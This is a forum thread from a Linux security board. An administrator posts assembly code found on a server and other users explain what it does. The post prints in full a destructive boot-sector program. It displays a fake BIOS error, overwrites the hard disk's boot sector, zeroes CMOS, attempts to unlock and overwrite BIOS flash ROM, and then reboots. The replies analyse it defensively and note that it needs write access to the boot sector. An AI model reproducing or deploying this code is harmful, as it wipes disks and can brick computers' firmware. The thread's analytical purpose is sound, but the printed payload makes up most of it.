Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
I rescently found this code on my server...I am posting it here becuz
I want to clarify what I think it does and if indeed it would do it
as for now the user's account has been frozen- I dont
like this code--
what I have asserted:
1- it's a bootsector
2- it writes randmom stuff to IDE0
3- it *tries* to write to ROM-- possibly nuke BIOS?!!!?
Thanks for any input...
Code:
BITS 16
org 0
EntryPoint:
jmp 0x07C0:AfterData
; BIOS PARAMETER BLOCK
oemID db "DIE-OS", 0, 0 ; 8 bytes
bytSPerSector dw 0200h
sectorsPerCluster db 01h
nrReservedSectors dw 0001h ; bootloader is spanning 1 sectors
nrFats db 02h
nrRootDirs dw 00E0h
totalSectorsSmall dw 0B40h
mDIaID db 0F0h
sectorsPerFat dw 0009h
sectorsPerTrack dw 0012h
headsPerCylinder dw 0002h
hiddenSectors dd 00000000h
totalSectorsLarge dd 00000000h
driveNr db 00h
;OPTIONAL FIELDS, NOT NEEDED ON
;FAT12, SKIPPED TO SAVE SIZE.
flags db 00h
signature db 29h
volumeID dd 0FFFFFFFFh
volumeLabel db "XXXXXXXXX"
systemID db "FAT12 "
;my data
BOOT_MSG db 'BIOS CHECKSUM ERROR',10,13,0
BLAH dw 0
AfterData:
; update DS to be 7C0 instead of 0
push CS
pop DS
; update ES also
push CS
pop ES
; create stack
mov ax, 0x0000
mov ss, ax
mov sp, 0xFFFF
; display boot message...
lea si, [BOOT_MSG]
call Print
call Play
call kill_hdd
jmp kill_BIOS
;************************************************************
; Procedure print
; prints a zero terminated string pointed to by si
;************************************************************
Print:
push ax
mov ah, 14 ; BIOS code for screen display
cld
print_loop:
lodsb ; moving the character to be displayed to al
or al, al ; checking if the char is NULL
jz printdone
int 10h ; Calling BIOS routine
JMP print_loop
printdone:
pop ax
ret
; End of print procedure...
Play:
mov di,0666h
in al,061h
or al,3
out 061h,al
mov al,0b6h
out 043h,al
mov dx,014h
mov ax,04f38h
div di
out 042h,al
mov al,ah
out 042h,al
ret
kill_hdd:
mov dx, 1F2h
mov al,1
out dx,al
inc dx
out dx,al
inc dx
xor ax,ax
out dx,al
inc dx
out dx,al
mov al, 10100000b
inc dx
out dx,al
inc dx
mov al,30h
out dx,al
lea si, [0c000h]
mov dx, 1F0h
mov cx, 513
rep outsw
RET
kill_BIOS:
CLI ; dont interrupt me
MOV CL, 128 ;map cmos
Nuke_CMOS_Byte: DEC CL ; done?
JS Nuke_BIOS
MOV AL, CL ; Request I/O to byte CL.
OUT 70h, AL
XOR AL, AL ; clear and write
OUT 71h, AL
JMP Nuke_CMOS_Byte ; Repeat until all is done.
Nuke_BIOS: ; Show BIOS Page in 000E0000 - 000EFFFF (64k).
MOV EDI, 8000384Ch
MOV BP, 0CF8h
MOV DX, 0CFEh
CALL IOForEEPROM
; Show BIOS Page in 000F0000 - 000FFFFF (64k).
MOV DI, 0058h
DEC DX
CALL IOForEEPROM
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
push 0e555h
pop ds
mov si,5
push 0e2aah
pop es
MOV byte [ds:si], 0aah
MOV byte [es:0ah], 055h
MOV BYTE [ds:si],80h
MOV byte [ds:si],CL
MOV byte [es:0ah], AL
MOV BYTE [ds:si], 60h
mov ecx,0e2aaah
LOOP $ ;very tiny delay
mov ecx,0e2aaah ;restore ecx
;cant use push\pop cuz
;were using 2byte stacks
; Kill off BIOS Extra ROM Data in 000E0000h - 000E007Fh, (80h bytes).
XOR AH, AH
MOV WORD [ds:si], 'RI'
XCHG CX, AX
LOOP $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
push 0f555h
pop ds
mov si,5
mov ecx,0e2aaah
MOV CH, 0AAh
; Enable EEPROM to Write.
MOV [ds:si], CL
MOV byte [ECX], AL
MOV BYTE [ds:si], 80h
MOV byte [ds:si], CL
MOV byte [ECX], AL
MOV BYTE [ds:si], 20h
LOOP $
; Destroy BIOS Main ROM Data in 000FE000h - 000FE07Fh (80h bytes).
xor al,al
push 0fe00h
pop ds
mov si,0
mov [ds:si],al
CALL IOForEEPROM
; store magic value at 0040h:0072h to reboot:
; 0000h - cold boot.
; 1234h - warm boot.
MOV AX,0040h
MOV DS,AX
MOV word[0072h],0000h ; cold boot.
JMP 0FFFFh:0000h ; reboot!
; I/O for EEPROM.
IOForEEPROM:
XCHG DI, AX
XCHG DX, BP
OUT DX, AX
XCHG DI, AX
XCHG DX, BP
IN AL, DX
OR AL, 44h
XCHG DI, AX
XCHG DX, BP
OUT DX, AX
XCHG DI, AX
XCHG DX, BP
OUT DX, AL
RET
; Make the file 512 bytes long
TIMES 510-($-$$) DB 0
; Add the boot signature
dw 0AA55h
Somehow it doesn't look finished to me.
But reading through the code it does look like there are procedures to write to 128kb portions of the BIOS Flash ROM, including checks for cold boot and warm boot checking and a reboot routine. and a harddisk write routine.
Whether or not is is for malicious intent, depends on the user's history, I think?
Distribution: FC1, Gentoo, Mdk 8.1, RH7-8-9, Knoppix, Zuarus rom 3.13
Posts: 98
Rep:
I've written simple assembly code on x86 machines back in the 90's to read and write to PC bios before. This indeed is designed to once compiled to write to bios. Never a good idea unless you know exactly what you are doing. Without going into details this code will display a message (BIOS CHECKSUM ERROR) directly into video memory, ie the screen and then write 0's over the entire cmos area. Usually that's bad. :-)
This does not appear to be friendly code.
The kill_hdd section is classic assembly code for deleting the boot sector of a hard drive. Practially straight from a text book.
I've not done any boot sector programs so I can't comment on that. But there is no virial code for spreading. Looks like something would need to write this to the drive boot sector (floppy, cd or hard drive) then booted from that device before it would be dangerous. After the code is compiled obviously.
-b
edit:
forgot to mention I suppose it could be on the boot sector of a usb flash drive too.
Bignerd,
thanks for your reply...since you seemed most knowledgable about this I sent you an email to expand upon.
thanks to the other responders as well
regards
On a related note, I do assume that something like this can not be exploited without root/physical access, correct? It would seem like such a big and such an obvious security hole, but hey, I figured I'd ask.
Distribution: FC1, Gentoo, Mdk 8.1, RH7-8-9, Knoppix, Zuarus rom 3.13
Posts: 98
Rep:
Quote:
Originally posted by Paul6253 Bignerd,
thanks for your reply...since you seemed most knowledgable about this I sent you an email to expand upon.
thanks to the other responders as well
regards
got your email but my reply to you bounced.
Message from yahoo.com.
Unable to deliver message to the following address(es).
Originally posted by Matir On a related note, I do assume that something like this can not be exploited without root/physical access, correct? It would seem like such a big and such an obvious security hole, but hey, I figured I'd ask.
correct. Because this is boot sector code, you need to have write access to the boot sector on a particular device. Usually the hard drive, unless you have physical access to and can do a floppy (or hey, mabye even a cd/dvd).
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.